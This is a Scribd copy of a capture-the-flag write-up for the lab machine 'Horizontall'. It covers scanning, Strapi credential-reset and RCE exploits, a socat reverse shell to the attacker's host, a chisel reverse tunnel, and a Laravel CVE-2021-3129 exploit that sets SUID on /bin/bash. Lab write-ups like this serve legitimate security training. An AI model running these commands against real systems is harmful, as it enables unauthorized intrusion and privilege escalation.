Scribd
Upload
9 views3 pages

Nmap and Exploit Guide for Horizontall

The document details a penetration testing process on a server with the IP 10.10.11.105, highlighting the use of tools like Masscan and Nmap to identify open ports and services. It describes exploiting vulnerabilities in Strapi and Laravel to gain unauthorized access and retrieve user and root flags. The process involves adding subdomains to the hosts file, using specific exploits, and setting up a reverse shell for further access.

Uploaded by

Niero
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
9 views3 pages

Nmap and Exploit Guide for Horizontall

The document details a penetration testing process on a server with the IP 10.10.11.105, highlighting the use of tools like Masscan and Nmap to identify open ports and services. It describes exploiting vulnerabilities in Strapi and Laravel to gain unauthorized access and retrieve user and root flags. The process involves adding subdomains to the hosts file, using specific exploits, and setting up a reverse shell for further access.

Uploaded by

Niero
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Horizontall - 13th Nov 2021

[Link]

Scanning
We can run masscan_to_nmap.py , a tool I made that you can find on my Github. It runs a
Masscan, identifies open ports, and then takes those open ports over to Nmap, and scans for
versions and default scripts against those ports.
1 PORT STATE SERVICE VERSION
2 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
3 | ssh-hostkey:
4 | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50ff:6b:0d:d5 (RSA)
5 | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
6 |_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
7 80/tcp open http nginx 1.14.0 (Ubuntu)
8 |_http-server-header: nginx/1.14.0 (Ubuntu)
9 |_http-title: Did not follow redirect to [Link]

This scan references a [Link] , so let's add that to our /etc/hosts

Enumeration
Given port 22's ssh isn't running a vulnerable service and I don't want to try and brute force
anything, lets give some attention to port 80's website

This is a pretty plain site, with no interesting functionality. However, dipping in to the source code
we can see a subdomain called '[Link]' is referenced. Let's add this to
our /etc/hosts file too

Api-Prod
If we traverse to this subdomain and the referenced directory, we are met with this uninspiring
page.

However, if we traverse to /admin , we find something quite interesting

Strapi
If we leverage searchsploit , we can see there are three exploits we can test

Let's copy the exploit and then fire it off


1 #pull exploit
2 searchsploit -m multiple/webapps/[Link]
3 #fire exploit
4 python3 [Link] [Link]

We get the creds admin ; SuperStrongPassword1, which allow us to sign in

Authorized
Now we have credentials, we can examine Strapi in more detail. We know from the exploit that we
are running likely version 3.0.0-beta.17.4, which we can verify by looking at the bottom left of the
admin portal
A strategic google allows us to find a specific post-authorization vuln CVE-2019-19609.
Lets pull the exploit and fire it off
1 python3 [Link] \
2 -d '[Link]' \
3 -jwt '#token' \
4 -l #yourip \
5 -p #listening port

Strapi Shell
uname -m confirms we're running a 64 bit machine, so I'm going to bring a socat binary over to
get a stable shell
1 # pull socat
2 wget \
3 [Link]
4
5 #take from attack machine to victim
6 python3 -m [Link] 80 #kali
7 wget [Link] #victim pullls
8 #make executable
9 chmod +x ./socat
10
11 #get a shell
12 # attacker
13 socat file:`tty`,raw,echo=0 tcp-listen:#yourport
14 # victim
15 ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:#yourip:#yourport

We can grab the user flag whilst we're here

Enumeration II
Looking around the box, there are some strange services only running locally on the network:
netstat -plunt

We can curl the various services, until we see Laravel running on port 8000: curl
[Link]

Laravel
In the same curl command, if we scroll down we can verify the version being run : Laravel v8 (PHP
v7.4.18)

If we google around with this version, we can find an exploit for the vulnerability : CVE-2021-3129

Tunnel
To use the exploit, we have to create a tunnel so we can access port 8000. Let's use chisel. Copy a
binary over to the victim machine and lets begin
1 #I always change chisel's name
2 #in kali
3 sudo ./chisel server --port 5001 --reverse
4 # in victim
5 ./chisel client [Link]:5001 R:8000:[Link]:8000

You can test it's worked by visiting [Link]:8000


Exploit
Okay now let's fire this bad boy off on our kali machine python3 [Link]
[Link] Monolog/RCE1 whoami

From here, you can then get the root flag

To get a root shell, try this


1 #the whoami at the end is just to confirm it has worked
2 python3 [Link] [Link] Monolog/RCE1 \
3 'chmod +s /bin/bash && whoami'
4
5 #then in a victim shell
6 /bin/bash -p

You might also like